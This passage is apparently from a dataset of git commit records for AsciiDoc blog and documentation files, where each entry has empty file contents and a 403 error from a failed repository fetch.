(2011)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-10-PlayStation-3-Bluray-Remote-20-Unboxing-2011.adoc","new_file":"_posts\/2011-12-10-PlayStation-3-Bluray-Remote-20-Unboxing-2011.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e6bc01fd7a344549754e38fd8cee2a68c93d885","subject":"Update 08-01-2019-Meinung-uber-Meinung.adoc","message":"Update 08-01-2019-Meinung-uber-Meinung.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/08-01-2019-Meinung-uber-Meinung.adoc","new_file":"_posts\/08-01-2019-Meinung-uber-Meinung.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"093786e4c3de70159c89edfdfc30eef2f15c643f","subject":"Update 2016-02-29-Creating-Complex-CSS3-Animations.adoc","message":"Update 2016-02-29-Creating-Complex-CSS3-Animations.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-02-29-Creating-Complex-CSS3-Animations.adoc","new_file":"_posts\/2016-02-29-Creating-Complex-CSS3-Animations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3cf0b808d7b8efa509d8f135f2e26e8129eed39","subject":"y2b create post Holiday Update \\\/ What's Next?","message":"y2b create post Holiday Update \\\/ What's Next?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-28-Holiday-Update--Whats-Next.adoc","new_file":"_posts\/2011-12-28-Holiday-Update--Whats-Next.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d24340735de3ebf28fd3bc6e36f260bbe1c04d0","subject":"Update 2016-01-23-Learning-XQuery-Resources.adoc","message":"Update 2016-01-23-Learning-XQuery-Resources.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f16c83efb42a371cf8b2d80a56b64f3cceff62bc","subject":"DBZ-1547 02\/2019 Newsletter","message":"DBZ-1547 02\/2019 Newsletter\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-10-17-debezium-newsletter-02-2019.adoc","new_file":"blog\/2019-10-17-debezium-newsletter-02-2019.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55ea50252dd470121a157d95f246785a176712a9","subject":"y2b create post I NEED YOUR HELP!","message":"y2b create post I NEED YOUR HELP!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-05-I-NEED-YOUR-HELP.adoc","new_file":"_posts\/2011-12-05-I-NEED-YOUR-HELP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13e7ad35a8fc1df90e53f87f8dbd7bed2549e3bb","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d4788c475162f46625176bbef8ffa4c36a7f6d0","subject":"create post THE CRAZIEST HEADPHONES EVER","message":"create post THE CRAZIEST HEADPHONES EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-THE-CRAZIEST-HEADPHONES-EVER.adoc","new_file":"_posts\/2018-02-26-THE-CRAZIEST-HEADPHONES-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7581ab852fe4e2ca51d8a24706056d74e802f06a","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa253d770a8197a44bbe8257b20fd732e70885b0","subject":"Update 2017-05-10-Geschaft-Korruption-Lobbyismus.adoc","message":"Update 2017-05-10-Geschaft-Korruption-Lobbyismus.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-10-Geschaft-Korruption-Lobbyismus.adoc","new_file":"_posts\/2017-05-10-Geschaft-Korruption-Lobbyismus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cec6fb8331d340a4224618c6be9fa16a086fe6d9","subject":"Update 2017-06-06-Your-Java-EE-app-on-Kubernetes.adoc","message":"Update 2017-06-06-Your-Java-EE-app-on-Kubernetes.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-06-06-Your-Java-EE-app-on-Kubernetes.adoc","new_file":"_posts\/2017-06-06-Your-Java-EE-app-on-Kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1da48550cebb871f78c0a9847d3da2d5a9e53b8","subject":"y2b create post What If You Could Hear What Others Are Hearing?","message":"y2b create post What If You Could Hear What Others Are Hearing?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-19-What-If-You-Could-Hear-What-Others-Are-Hearing.adoc","new_file":"_posts\/2017-02-19-What-If-You-Could-Hear-What-Others-Are-Hearing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"255382862d8ddf57112bb519461ea26fd0bc961e","subject":"job #11634 - started writing design note","message":"job #11634 - started writing design note","repos":"xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11634_signal_mark_sync\/11634_mark_sync_dnt.adoc","new_file":"doc-bridgepoint\/notes\/11634_signal_mark_sync\/11634_mark_sync_dnt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93a40e0b1a0d30018fb55937a0672eb5327e6a14","subject":"Update 2016-04-04-The-Power-of-Peers.adoc","message":"Update 2016-04-04-The-Power-of-Peers.adoc","repos":"metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/blog,metasean\/blog,metasean\/hubpress.io","old_file":"_posts\/2016-04-04-The-Power-of-Peers.adoc","new_file":"_posts\/2016-04-04-The-Power-of-Peers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21a64636f05490502a1af100c933343fda8f36c3","subject":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","message":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-19-OnePlus-5T-Lava-Red-Unboxing--500-Cant-Go-Further.adoc","new_file":"_posts\/2018-01-19-OnePlus-5T-Lava-Red-Unboxing--500-Cant-Go-Further.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8868da1c0ebe032a17b5f0661ec142152cae87d9","subject":"Create 2015-04-14-1.adoc","message":"Create 2015-04-14-1.adoc","repos":"lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-14-1.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-14-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4654d19c3dbab8f80dff7456e116bdb7e464cc23","subject":"created asciidoc manual","message":"created asciidoc manual\n","repos":"kenliu\/grails-elastic-beanstalk","old_file":"src\/asciidoc\/manual.asciidoc","new_file":"src\/asciidoc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kenliu\/grails-elastic-beanstalk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f8f64cc7a8b44b807a7a530650bc2307b172bd7","subject":"Update 2016-09-16-innovation-Engineer-Aruaru.adoc","message":"Update 2016-09-16-innovation-Engineer-Aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-16-innovation-Engineer-Aruaru.adoc","new_file":"_posts\/2016-09-16-innovation-Engineer-Aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e4dc141fd8f4b7abb375cc09ec4f2125203ec7f","subject":"Update 2017-10-20-Severin-Tagliante-Saracino.adoc","message":"Update 2017-10-20-Severin-Tagliante-Saracino.adoc","repos":"severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io","old_file":"_posts\/2017-10-20-Severin-Tagliante-Saracino.adoc","new_file":"_posts\/2017-10-20-Severin-Tagliante-Saracino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/severin31\/severin31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0be96a767da1bd05016ac22def49128652ea213c","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8988ba1a89e42fb42f65678a683b3bf1c0f34f56","subject":"Update 2015-03-02-Create-Ubuntu-VM-on-MS-Azure-and-Login-onto-VM.adoc","message":"Update 2015-03-02-Create-Ubuntu-VM-on-MS-Azure-and-Login-onto-VM.adoc","repos":"hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io","old_file":"_posts\/2015-03-02-Create-Ubuntu-VM-on-MS-Azure-and-Login-onto-VM.adoc","new_file":"_posts\/2015-03-02-Create-Ubuntu-VM-on-MS-Azure-and-Login-onto-VM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hemantthakur\/hemantthakur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32c7ba8fd392a82f1502e7c9dbcfebb1895f4cbe","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61445b0d1388439e2655b2fc3e75b8219ea72b65","subject":"Minor doc improvement","message":"Minor doc improvement\n","repos":"Sanne\/hibernate-ogm,uugaa\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,ZJaffee\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,ZJaffee\/hibernate-ogm,ZJaffee\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,jhalliday\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,schernolyas\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm-contrib","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"23b31a04e121aa328c9a31ef98e32b95bfc7a3b6","subject":"y2b create post The Customizable Android Phone You've Never Heard Of...","message":"y2b create post The Customizable Android Phone You've Never Heard Of...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-02-The-Customizable-Android-Phone-Youve-Never-Heard-Of.adoc","new_file":"_posts\/2017-09-02-The-Customizable-Android-Phone-Youve-Never-Heard-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"502723a2e1baf6764b8a8098672b7589c0febe88","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cd1f79adf964df75fd9d7dd7720e75dc0a4bc73","subject":"y2b create post YOUTUBE SENT ME A GIFT!","message":"y2b create post YOUTUBE SENT ME A GIFT!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-22-YOUTUBE-SENT-ME-A-GIFT.adoc","new_file":"_posts\/2015-12-22-YOUTUBE-SENT-ME-A-GIFT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"249ff4c81cc34a9ba7625a3eb4d6af093dcc0fb9","subject":"Update 2016-11-08-185000-Tuesday-Evening.adoc","message":"Update 2016-11-08-185000-Tuesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_file":"_posts\/2016-11-08-185000-Tuesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8756d6efa0102f4e67fd5689deb08e37ef43d812","subject":"DBZ-4260 blog posts for Debezium UI SMTs and Topic Groups","message":"DBZ-4260 blog posts for Debezium UI SMTs and Topic Groups\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-11-22-debezium-ui-transforms.adoc","new_file":"_posts\/2021-11-22-debezium-ui-transforms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4013719a53f9e8a34c7c9e5318e857b360b9076","subject":"Create secure-comm.adoc","message":"Create secure-comm.adoc","repos":"jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/secure-comm.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/secure-comm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05eb23e41d6938bd4aaf14183765b0751baed283","subject":"Update 2016-07-20-Episode-65-Influencing-the-Back-End-of-the-Field.adoc","message":"Update 2016-07-20-Episode-65-Influencing-the-Back-End-of-the-Field.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-07-20-Episode-65-Influencing-the-Back-End-of-the-Field.adoc","new_file":"_posts\/2016-07-20-Episode-65-Influencing-the-Back-End-of-the-Field.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20091dc55c696d9258dfab92bbe69183b1d72e61","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"504eda250bb52c2c2013c34251733e0d8701fb3a","subject":"Deleted 2016-11-3-you-know-what.adoc","message":"Deleted 2016-11-3-you-know-what.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"2016-11-3-you-know-what.adoc","new_file":"2016-11-3-you-know-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5db0aa47a06a1932de745e1142306f8729c16eff","subject":"y2b create post GoldenEye 007 Reloaded Double O Edition Unboxing (PS3)","message":"y2b create post GoldenEye 007 Reloaded Double O Edition Unboxing (PS3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-03-GoldenEye-007-Reloaded-Double-O-Edition-Unboxing-PS3.adoc","new_file":"_posts\/2011-11-03-GoldenEye-007-Reloaded-Double-O-Edition-Unboxing-PS3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c3be46a7af017e8b010b63df1c5101d1bdc7834","subject":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","message":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26cd24b8a03063ab0773a66aa236208affa1f4fb","subject":"Update 2016-10-12-Teste.adoc","message":"Update 2016-10-12-Teste.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2016-10-12-Teste.adoc","new_file":"_posts\/2016-10-12-Teste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba97b63e0f9af9e2a2d1f69225cf1ce59cba69df","subject":"Renamed '_posts\/2017-10-27-Cyber-Exile.adoc' to '_posts\/2017-10-27-Intro.adoc'","message":"Renamed '_posts\/2017-10-27-Cyber-Exile.adoc' to '_posts\/2017-10-27-Intro.adoc'","repos":"netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io","old_file":"_posts\/2017-10-27-Intro.adoc","new_file":"_posts\/2017-10-27-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netrunnerX\/netrunnerx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f29effa7afc30613a0997a84fb4133515420fab","subject":"Update 